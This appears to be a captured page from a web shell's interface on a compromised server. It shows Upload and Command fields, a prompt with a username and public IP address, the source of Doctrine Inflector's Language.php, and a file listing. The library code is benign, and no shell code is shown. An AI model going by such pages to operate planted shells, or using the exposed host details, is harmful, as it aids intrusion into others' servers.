[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.16.83.167: ~ $
<?php

declare(strict_types=1);

namespace Doctrine\Inflector;

final class Language
{
    public const ENGLISH          = 'english';
    public const FRENCH           = 'french';
    public const NORWEGIAN_BOKMAL = 'norwegian-bokmal';
    public const PORTUGUESE       = 'portuguese';
    public const SPANISH          = 'spanish';
    public const TURKISH          = 'turkish';

    private function __construct()
    {
    }
}

Filemanager

Name Type Size Permission Actions
Rules Folder 0755
CachedWordInflector.php File 511 B 0644
GenericLanguageInflectorFactory.php File 1.64 KB 0644
Inflector.php File 12.55 KB 0644
InflectorFactory.php File 1.39 KB 0644
Language.php File 430 B 0644
LanguageInflectorFactory.php File 805 B 0644
NoopWordInflector.php File 201 B 0644
RulesetInflector.php File 1.32 KB 0644
WordInflector.php File 143 B 0644